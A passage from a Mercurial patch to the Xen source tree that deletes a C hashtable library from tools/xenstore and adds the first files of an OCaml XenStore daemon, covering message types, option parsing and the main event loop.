786433, 1572869, -3145739, 6291469, 12582917, 25165843, -50331653, 100663319, 201326611, 402653189, -805306457, 1610612741 -}; -const unsigned int prime_table_length = sizeof(primes)/sizeof(primes[0]); -const unsigned int max_load_factor = 65; /* percentage */ - -/*****************************************************************************/ -struct hashtable * -create_hashtable(unsigned int minsize, - unsigned int (*hashf) (void*), - int (*eqf) (void*,void*)) -{ - struct hashtable *h; - unsigned int pindex, size = primes[0]; - - /* Check requested hashtable isn't too large */ - if (minsize > (1u << 30)) return NULL; - - /* Enforce size as prime */ - for (pindex=0; pindex < prime_table_length; pindex++) { - if (primes[pindex] > minsize) { size = primes[pindex]; break; } - } - - h = (struct hashtable *)calloc(1, sizeof(struct hashtable)); - if (NULL == h) - goto err0; - h->table = (struct entry **)calloc(size, sizeof(struct entry *)); - if (NULL == h->table) - goto err1; - - h->tablelength = size; - h->primeindex = pindex; - h->entrycount = 0; - h->hashfn = hashf; - h->eqfn = eqf; - h->loadlimit = (unsigned int)(((uint64_t)size * max_load_factor) / 100); - return h; - -err1: - free(h); -err0: - return NULL; -} - -/*****************************************************************************/ -unsigned int -hash(struct hashtable *h, void *k) -{ - /* Aim to protect against poor hash functions by adding logic here - * - logic taken from java 1.4 hashtable source */ - unsigned int i = h->hashfn(k); - i += ~(i << 9); - i ^= ((i >> 14) | (i << 18)); /* >>> */ - i += (i << 4); - i ^= ((i >> 10) | (i << 22)); /* >>> */ - return i; -} - -/*****************************************************************************/ -static int -hashtable_expand(struct hashtable *h) -{ - /* Double the size of the table to accomodate more entries */ - struct entry **newtable; - struct entry *e; - struct entry **pE; - unsigned int newsize, i, index; - /* Check we're not hitting max capacity */ - if (h->primeindex == (prime_table_length - 1)) return 0; - newsize = primes[++(h->primeindex)]; - - newtable = (struct entry **)calloc(newsize, sizeof(struct entry*)); - if (NULL != newtable) - { - /* This algorithm is not 'stable'. ie. it reverses the list - * when it transfers entries between the tables */ - for (i = 0; i < h->tablelength; i++) { - while (NULL != (e = h->table[i])) { - h->table[i] = e->next; - index = indexFor(newsize,e->h); - e->next = newtable[index]; - newtable[index] = e; - } - } - free(h->table); - h->table = newtable; - } - /* Plan B: realloc instead */ - else - { - newtable = (struct entry **) - realloc(h->table, newsize * sizeof(struct entry *)); - if (NULL == newtable) { (h->primeindex)--; return 0; } - h->table = newtable; - memset(newtable[h->tablelength], 0, newsize - h->tablelength); - for (i = 0; i < h->tablelength; i++) { - for (pE = &(newtable[i]), e = *pE; e != NULL; e = *pE) { - index = indexFor(newsize,e->h); - if (index == i) - { - pE = &(e->next); - } - else - { - *pE = e->next; - e->next = newtable[index]; - newtable[index] = e; - } - } - } - } - h->tablelength = newsize; - h->loadlimit = (unsigned int) - (((uint64_t)newsize * max_load_factor) / 100); - return -1; -} - -/*****************************************************************************/ -unsigned int -hashtable_count(struct hashtable *h) -{ - return h->entrycount; -} - -/*****************************************************************************/ -int -hashtable_insert(struct hashtable *h, void *k, void *v) -{ - /* This method allows duplicate keys - but they shouldn't be used */ - unsigned int index; - struct entry *e; - if (++(h->entrycount) > h->loadlimit) - { - /* Ignore the return value. If expand fails, we should - * still try cramming just this value into the existing table - * -- we may not have memory for a larger table, but one more - * element may be ok. Next time we insert, we'll try expanding again.*/ - hashtable_expand(h); - } - e = (struct entry *)calloc(1, sizeof(struct entry)); - if (NULL == e) { --(h->entrycount); return 0; } /*oom*/ - e->h = hash(h,k); - index = indexFor(h->tablelength,e->h); - e->k = k; - e->v = v; - e->next = h->table[index]; - h->table[index] = e; - return -1; -} - -/*****************************************************************************/ -void * /* returns value associated with key */ -hashtable_search(struct hashtable *h, void *k) -{ - struct entry *e; - unsigned int hashvalue, index; - hashvalue = hash(h,k); - index = indexFor(h->tablelength,hashvalue); - e = h->table[index]; - while (NULL != e) - { - /* Check hash value to short circuit heavier comparison */ - if ((hashvalue == e->h) && (h->eqfn(k, e->k))) return e->v; - e = e->next; - } - return NULL; -} - -/*****************************************************************************/ -void * /* returns value associated with key */ -hashtable_remove(struct hashtable *h, void *k) -{ - /* TODO: consider compacting the table when the load factor drops enough, - * or provide a 'compact' method. */ - - struct entry *e; - struct entry **pE; - void *v; - unsigned int hashvalue, index; - - hashvalue = hash(h,k); - index = indexFor(h->tablelength,hash(h,k)); - pE = &(h->table[index]); - e = *pE; - while (NULL != e) - { - /* Check hash value to short circuit heavier comparison */ - if ((hashvalue == e->h) && (h->eqfn(k, e->k))) - { - *pE = e->next; - h->entrycount--; - v = e->v; - freekey(e->k); - free(e); - return v; - } - pE = &(e->next); - e = e->next; - } - return NULL; -} - -/*****************************************************************************/ -/* destroy */ -void -hashtable_destroy(struct hashtable *h, int free_values) -{ - unsigned int i; - struct entry *e, *f; - struct entry **table = h->table; - if (free_values) - { - for (i = 0; i < h->tablelength; i++) - { - e = table[i]; - while (NULL != e) - { f = e; e = e->next; freekey(f->k); free(f->v); free(f); } - } - } - else - { - for (i = 0; i < h->tablelength; i++) - { - e = table[i]; - while (NULL != e) - { f = e; e = e->next; freekey(f->k); free(f); } - } - } - free(h->table); - free(h); -} - -/* - * Copyright (c) 2002, Christopher Clark - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * * Neither the name of the original author; nor the names of any contributors - * may be used to endorse or promote products derived from this software - * without specific prior written permission. - * - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS - * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT - * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR - * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER - * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, - * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, - * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR - * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF - * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING - * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -*/ diff -r 10a8fae412c5 tools/xenstore/hashtable.h --- a/tools/xenstore/hashtable.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,199 +0,0 @@ -/* Copyright (C) 2002 Christopher Clark */ - -#ifndef __HASHTABLE_CWC22_H__ -#define __HASHTABLE_CWC22_H__ - -struct hashtable; - -/* Example of use: - * - * struct hashtable *h; - * struct some_key *k; - * struct some_value *v; - * - * static unsigned int hash_from_key_fn( void *k ); - * static int keys_equal_fn ( void *key1, void *key2 ); - * - * h = create_hashtable(16, hash_from_key_fn, keys_equal_fn); - * k = (struct some_key *) malloc(sizeof(struct some_key)); - * v = (struct some_value *) malloc(sizeof(struct some_value)); - * - * (initialise k and v to suitable values) - * - * if (! hashtable_insert(h,k,v) ) - * { exit(-1); } - * - * if (NULL == (found = hashtable_search(h,k) )) - * { printf("not found!"); } - * - * if (NULL == (found = hashtable_remove(h,k) )) - * { printf("Not found\n"); } - * - */ - -/* Macros may be used to define type-safe(r) hashtable access functions, with - * methods specialized to take known key and value types as parameters. - * - * Example: - * - * Insert this at the start of your file: - * - * DEFINE_HASHTABLE_INSERT(insert_some, struct some_key, struct some_value); - * DEFINE_HASHTABLE_SEARCH(search_some, struct some_key, struct some_value); - * DEFINE_HASHTABLE_REMOVE(remove_some, struct some_key, struct some_value); - * - * This defines the functions 'insert_some', 'search_some' and 'remove_some'. - * These operate just like hashtable_insert etc., with the same parameters, - * but their function signatures have 'struct some_key *' rather than - * 'void *', and hence can generate compile time errors if your program is - * supplying incorrect data as a key (and similarly for value). - * - * Note that the hash and key equality functions passed to create_hashtable - * still take 'void *' parameters instead of 'some key *'. This shouldn't be - * a difficult issue as they're only defined and passed once, and the other - * functions will ensure that only valid keys are supplied to them. - * - * The cost for this checking is increased code size and runtime overhead - * - if performance is important, it may be worth switching back to the - * unsafe methods once your program has been debugged with the safe methods. - * This just requires switching to some simple alternative defines - eg: - * #define insert_some hashtable_insert - * - */ - -/***************************************************************************** - * create_hashtable - - * @name create_hashtable - * @param minsize minimum initial size of hashtable - * @param hashfunction function for hashing keys - * @param key_eq_fn function for determining key equality - * @return newly created hashtable or NULL on failure - */ - -struct hashtable * -create_hashtable(unsigned int minsize, - unsigned int (*hashfunction) (void*), - int (*key_eq_fn) (void*,void*)); - -/***************************************************************************** - * hashtable_insert - - * @name hashtable_insert - * @param h the hashtable to insert into - * @param k the key - hashtable claims ownership and will free on removal - * @param v the value - does not claim ownership - * @return non-zero for successful insertion - * - * This function will cause the table to expand if the insertion would take - * the ratio of entries to table size over the maximum load factor. - * - * This function does not check for repeated insertions with a duplicate key. - * The value returned when using a duplicate key is undefined -- when - * the hashtable changes size, the order of retrieval of duplicate key - * entries is reversed. - * If in doubt, remove before insert. - */ - -int -hashtable_insert(struct hashtable *h, void *k, void *v); - -#define DEFINE_HASHTABLE_INSERT(fnname, keytype, valuetype) \ -int fnname (struct hashtable *h, keytype *k, valuetype *v) \ -{ \ - return hashtable_insert(h,k,v); \ -} - -/***************************************************************************** - * hashtable_search - - * @name hashtable_search - * @param h the hashtable to search - * @param k the key to search for - does not claim ownership - * @return the value associated with the key, or NULL if none found - */ - -void * -hashtable_search(struct hashtable *h, void *k); - -#define DEFINE_HASHTABLE_SEARCH(fnname, keytype, valuetype) \ -valuetype * fnname (struct hashtable *h, keytype *k) \ -{ \ - return (valuetype *) (hashtable_search(h,k)); \ -} - -/***************************************************************************** - * hashtable_remove - - * @name hashtable_remove - * @param h the hashtable to remove the item from - * @param k the key to search for - does not claim ownership - * @return the value associated with the key, or NULL if none found - */ - -void * /* returns value */ -hashtable_remove(struct hashtable *h, void *k); - -#define DEFINE_HASHTABLE_REMOVE(fnname, keytype, valuetype) \ -valuetype * fnname (struct hashtable *h, keytype *k) \ -{ \ - return (valuetype *) (hashtable_remove(h,k)); \ -} - - -/***************************************************************************** - * hashtable_count - - * @name hashtable_count - * @param h the hashtable - * @return the number of items stored in the hashtable - */ -unsigned int -hashtable_count(struct hashtable *h); - - -/***************************************************************************** - * hashtable_destroy - - * @name hashtable_destroy - * @param h the hashtable - * @param free_values whether to call 'free' on the remaining values - */ - -void -hashtable_destroy(struct hashtable *h, int free_values); - -#endif /* __HASHTABLE_CWC22_H__ */ - -/* - * Copyright (c) 2002, Christopher Clark - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * * Neither the name of the original author; nor the names of any contributors - * may be used to endorse or promote products derived from this software - * without specific prior written permission. - * - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS - * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT - * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR - * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER - * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, - * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, - * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR - * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF - * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING - * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -*/ diff -r 10a8fae412c5 tools/xenstore/hashtable_private.h --- a/tools/xenstore/hashtable_private.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,85 +0,0 @@ -/* Copyright (C) 2002, 2004 Christopher Clark */ - -#ifndef __HASHTABLE_PRIVATE_CWC22_H__ -#define __HASHTABLE_PRIVATE_CWC22_H__ - -#include "hashtable.h" - -/*****************************************************************************/ -struct entry -{ - void *k, *v; - unsigned int h; - struct entry *next; -}; - -struct hashtable { - unsigned int tablelength; - struct entry **table; - unsigned int entrycount; - unsigned int loadlimit; - unsigned int primeindex; - unsigned int (*hashfn) (void *k); - int (*eqfn) (void *k1, void *k2); -}; - -/*****************************************************************************/ -unsigned int -hash(struct hashtable *h, void *k); - -/*****************************************************************************/ -/* indexFor */ -static inline unsigned int -indexFor(unsigned int tablelength, unsigned int hashvalue) { - return (hashvalue % tablelength); -}; - -/* Only works if tablelength == 2^N */ -/*static inline unsigned int -indexFor(unsigned int tablelength, unsigned int hashvalue) -{ - return (hashvalue & (tablelength - 1u)); -} -*/ - -/*****************************************************************************/ -#define freekey(X) free(X) -/*define freekey(X) ; */ - - -/*****************************************************************************/ - -#endif /* __HASHTABLE_PRIVATE_CWC22_H__*/ - -/* - * Copyright (c) 2002, Christopher Clark - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * * Neither the name of the original author; nor the names of any contributors - * may be used to endorse or promote products derived from this software - * without specific prior written permission. - * - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS - * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT - * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR - * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER - * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, - * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, - * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR - * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF - * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING - * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -*/ diff -r 10a8fae412c5 tools/xenstore/interface.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/interface.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,27 @@ +(* + Interface for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +class virtual interface = +object + method virtual can_read : bool + method virtual can_write : bool + method virtual destroy : unit + method virtual read : string -> int -> int -> int + method virtual write : string -> int -> int -> int +end diff -r 10a8fae412c5 tools/xenstore/main.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/main.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,85 @@ +(* + Main functions for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Handle event *) +let handle_event xenstored = + let port = Eventchan.pending () in + if port <> Constants.null_file_descr + then ( + if port = xenstored#virq_port + then ( + let domains = xenstored#domains#cleanup in + if List.length domains > 0 + then ( + List.iter (fun domain -> if domain#is_dying then xenstored#remove_domain domain) domains; + xenstored#watches#fire_watches "@releaseDomain" false false + ) + ); + if Eventchan.unmask port = - 1 then Utils.barf_perror "Failed to write to event channel" + ) + else Utils.barf_perror ("Failed to read from event channel") + +(* Handle I/O for domains *) +let handle_io xenstored = + let handle_io_for_domain domain = + try + if domain#can_read then domain#read; + if domain#has_input_message + then ( + Trace.io domain#id "IN" (Os.get_time ()) (List.hd domain#input_messages); + let msg_type = Message.message_type_to_string (List.hd domain#input_messages).Message.header.Message.message_type + and msg_length = (List.hd domain#input_messages).Message.header.Message.length in + if xenstored#options.Option.verbose then (Printf.printf "Got message %s len %d from %d\n" msg_type msg_length domain#id; flush stdout); + Process.process xenstored domain + ); + while domain#can_write do + let msg_type = Message.message_type_to_string (List.hd domain#output_messages).Message.header.Message.message_type + and msg_payload = (List.hd domain#output_messages).Message.payload in + if xenstored#options.Option.verbose then (Printf.printf "Writing msg %s (%s) out to %d\n" msg_type msg_payload domain#id; flush stdout); + Trace.io domain#id "OUT" (Os.get_time ()) (List.hd domain#output_messages); + domain#write + done + with Constants.Xs_error (Constants.EIO, _, _) -> ( + (try if not (Domain.is_unprivileged domain) then while domain#can_write do domain#write done with _ -> ()); + xenstored#remove_domain domain; + if Domain.is_unprivileged domain then xenstored#watches#fire_watches "@releaseDomain" false false + ) + in + List.iter handle_io_for_domain xenstored#domains#domains + +(* Main method *) +let main = + let options = Option.parse () in + Option.check_options options; + + let store = new Store.store in + let xenstored = new Xenstored.xenstored options store in + + Os.init (); + + let event_chan = xenstored#initialise_domains in + + while true do + Os.check_connections xenstored event_chan; + if Os.check_event_chan event_chan then handle_event xenstored; + handle_io xenstored + done + +(* Register callback for main function *) +let _ = Callback.register "main" main diff -r 10a8fae412c5 tools/xenstore/main_c.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/main_c.c Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,49 @@ +/* + C main function for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*/ + +#include +#include +#include +#include + +#include + +#include +#include +#include +#include + +int main(int argc, char *argv[], char *envp[]) +{ + value *val; + + /* Wait before things might hang up */ + sleep(1); + + caml_startup(argv); + val = caml_named_value("main"); + if (!val) { + printf("Couldn't find Caml main"); + return 1; + } + + caml_callback(*val, Val_int(0)); + + return 0; +} diff -r 10a8fae412c5 tools/xenstore/message.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/message.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,184 @@ +(* + Messages for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let header_size = 16; + +(* XenStore message types *) +type xs_message_type = + | XS_DEBUG + | XS_DIRECTORY + | XS_READ + | XS_GET_PERMS + | XS_WATCH + | XS_UNWATCH + | XS_TRANSACTION_START + | XS_TRANSACTION_END + | XS_INTRODUCE + | XS_RELEASE + | XS_GET_DOMAIN_PATH + | XS_WRITE + | XS_MKDIR + | XS_RM + | XS_SET_PERMS + | XS_WATCH_EVENT + | XS_ERROR + | XS_IS_DOMAIN_INTRODUCED + | XS_RESUME + | XS_SET_TARGET + | XS_UNKNOWN + +(* Convert a message type to an int32 *) +let xs_message_type_to_int32 message_type = + match message_type with + | XS_DEBUG -> 0l + | XS_DIRECTORY -> 1l + | XS_READ -> 2l + | XS_GET_PERMS -> 3l + | XS_WATCH -> 4l + | XS_UNWATCH -> 5l + | XS_TRANSACTION_START -> 6l + | XS_TRANSACTION_END -> 7l + | XS_INTRODUCE -> 8l + | XS_RELEASE -> 9l + | XS_GET_DOMAIN_PATH -> 10l + | XS_WRITE -> 11l + | XS_MKDIR -> 12l + | XS_RM -> 13l + | XS_SET_PERMS -> 14l + | XS_WATCH_EVENT -> 15l + | XS_ERROR -> 16l + | XS_IS_DOMAIN_INTRODUCED -> 17l + | XS_RESUME -> 18l + | XS_SET_TARGET -> 19l + | XS_UNKNOWN -> - 1l + +(* Convert an int32 to a message type *) +let int32_to_message_type xs_message_type = + match xs_message_type with + | 0l -> XS_DEBUG + | 1l -> XS_DIRECTORY + | 2l -> XS_READ + | 3l -> XS_GET_PERMS + | 4l -> XS_WATCH + | 5l -> XS_UNWATCH + | 6l -> XS_TRANSACTION_START + | 7l -> XS_TRANSACTION_END + | 8l -> XS_INTRODUCE + | 9l -> XS_RELEASE + | 10l -> XS_GET_DOMAIN_PATH + | 11l -> XS_WRITE + | 12l -> XS_MKDIR + | 13l -> XS_RM + | 14l -> XS_SET_PERMS + | 15l -> XS_WATCH_EVENT + | 16l -> XS_ERROR + | 17l -> XS_IS_DOMAIN_INTRODUCED + | 18l -> XS_RESUME + | 19l -> XS_SET_TARGET + | _ -> XS_UNKNOWN + +(* Return string representation of a message type *) +let message_type_to_string message_type = + match message_type with + | XS_DEBUG -> "DEBUG" + | XS_DIRECTORY -> "DIRECTORY" + | XS_READ -> "READ" + | XS_GET_PERMS -> "GET_PERMS" + | XS_WATCH -> "WATCH" + | XS_UNWATCH -> "UNWATCH" + | XS_TRANSACTION_START -> "TRANSACTION_START" + | XS_TRANSACTION_END -> "TRANSACTION_END" + | XS_INTRODUCE -> "INTRODUCE" + | XS_RELEASE -> "RELEASE" + | XS_GET_DOMAIN_PATH -> "GET_DOMAIN_PATH" + | XS_WRITE -> "WRITE" + | XS_MKDIR -> "MKDIR" + | XS_RM -> "RM" + | XS_SET_PERMS -> "SET_PERMS" + | XS_WATCH_EVENT -> "WATCH_EVENT" + | XS_ERROR -> "ERROR" + | XS_IS_DOMAIN_INTRODUCED -> "IS_DOMAIN_INTRODUCED" + | XS_RESUME -> "RESUME" + | XS_SET_TARGET -> "SET_TARGET" + | XS_UNKNOWN -> "UNKNOWN" + +(* Message header *) +type header = + { + message_type : xs_message_type; + transaction_id : int32; + request_id : int32; + length : int + } + +(* Message *) +type message = + { + header : header; + payload : string + } + +(* Make a message *) +let make message_type transaction_id request_id payload = + { + header = + { + message_type = message_type; + transaction_id = transaction_id; + request_id = request_id; + length = (String.length payload) + }; + payload = payload + } + +(* Null message *) +let null_message = make XS_UNKNOWN 0l 0l Constants.null_string + +(* ACK message *) +let ack message = + make message.header.message_type message.header.transaction_id message.header.request_id (Utils.null_terminate "OK") + +(* Error message *) +let error message error = + make XS_ERROR message.header.transaction_id message.header.request_id (Utils.null_terminate (Constants.error_message error)) + +(* Event message *) +let event payload = + make XS_WATCH_EVENT 0l 0l payload + +(* Reply message *) +let reply message payload = + make message.header.message_type message.header.transaction_id message.header.request_id payload + +(* Deserialise a message header from a string *)(* Null message *) +let deserialise_header buffer = + { + message_type = int32_to_message_type (Utils.bytes_to_int32 (String.sub buffer 0 4)); + transaction_id = Utils.bytes_to_int32 (String.sub buffer 8 4); + request_id = Utils.bytes_to_int32 (String.sub buffer 4 4); + length = Utils.bytes_to_int (String.sub buffer 12 4) + } + +(* Serialise a message header to a string *) +let serialise_header header = + let message_type = Utils.int32_to_bytes (xs_message_type_to_int32 header.message_type) + and transaction_id = Utils.int32_to_bytes header.transaction_id + and request_id = Utils.int32_to_bytes header.request_id + and length = Utils.int_to_bytes header.length in + message_type ^ request_id ^ transaction_id ^ length diff -r 10a8fae412c5 tools/xenstore/option.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/option.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,95 @@ +(* + Options for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Options type *) +type t = { + fork : bool; + output_pid : bool; + domain_init : bool; + separate_domain : bool; + pid_file : string; + trace_file : string; + recovery : bool; + verbose : bool; + quota_num_entries_per_domain : int; + quota_max_entry_size : int; + quota_num_watches_per_domain : int; + quota_max_transaction : int +} + +(* Usage message header *) +let usage = "Usage:\n xenstored \n\nwhere options may include:\n" + +(* Parse command-line options *) +let parse () = + (* Default options *) + let fork = ref true + and output_pid = ref false + and domain_init = ref true + and pid_file = ref "" + and trace_file = ref "" + and recovery = ref true + and verbose = ref false + and separate_domain = ref false + and quota_num_entries_per_domain = ref 1000 + and quota_max_entry_size = ref 2048 + and quota_num_watches_per_domain = ref 128 + and quota_max_transaction = ref 10 in + + (* Command-line arguments list *) + let spec_list = Arg.align [ + ("--no-domain-init", Arg.Clear domain_init, " to state that xenstored should not initialise dom0,"); + ("--pid-file", Arg.Set_string pid_file, " giving a file for the daemon's pid to be written,"); + ("--no-fork", Arg.Clear fork, " to request that the daemon does not fork,"); + ("--output-pid", Arg.Set output_pid, " to request that the pid of the daemon is output,"); + ("--trace-file", Arg.String (fun s -> trace_file := s; Trace.traceout := Some (open_out s)), " giving the file for logging,"); + ("--entry-nb", Arg.Set_int quota_num_entries_per_domain, " limit the number of entries per domain,"); + ("--entry-size", Arg.Set_int quota_max_entry_size, " limit the size of entry per domain,"); + ("--entry-watch", Arg.Set_int quota_num_watches_per_domain," limit the number of watches per domain,"); + ("--transaction", Arg.Set_int quota_max_transaction, " limit the number of transaction allowed per domain,"); + ("--no-recovery", Arg.Clear recovery, " to request that no recovery should be attempted when the store is corrupted (debug only),"); + ("--preserve-local", Arg.Unit (fun () -> ()), " to request that /local is preserved on start-up,"); + ("--verbose", Arg.Set verbose, " to request verbose execution."); + ("--separate-dom", Arg.Set separate_domain, " xenstored runs in it's own domain."); + ] in + + (* Parse command-line arguments *) + Arg.parse spec_list Os.parse_option usage; + + (* Set and return chosen options *) + { + fork = !fork; + output_pid = !output_pid; + domain_init = !domain_init; + separate_domain = !separate_domain; + pid_file = !pid_file; + trace_file = !trace_file; + recovery = !recovery; + verbose = !verbose; + quota_num_entries_per_domain = !quota_num_entries_per_domain; + quota_max_entry_size = !quota_max_entry_size; + quota_num_watches_per_domain = !quota_num_watches_per_domain; + quota_max_transaction = !quota_max_transaction + } + +let check_options options = + if not options.domain_init && options.separate_domain then Utils.barf_perror "Incompatible options"; + if options.fork then Os.daemonise (); + if options.pid_file <> Constants.null_string then Os.write_pid_file options.pid_file; + if options.output_pid then (Printf.printf "%d\n" (Os.get_pid ()); flush stdout) diff -r 10a8fae412c5 tools/xenstore/os.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/os.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,224 @@ +(* + OS-specific code for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let xenstored_proc_domid = "/proc/xen/xsd_domid" +let 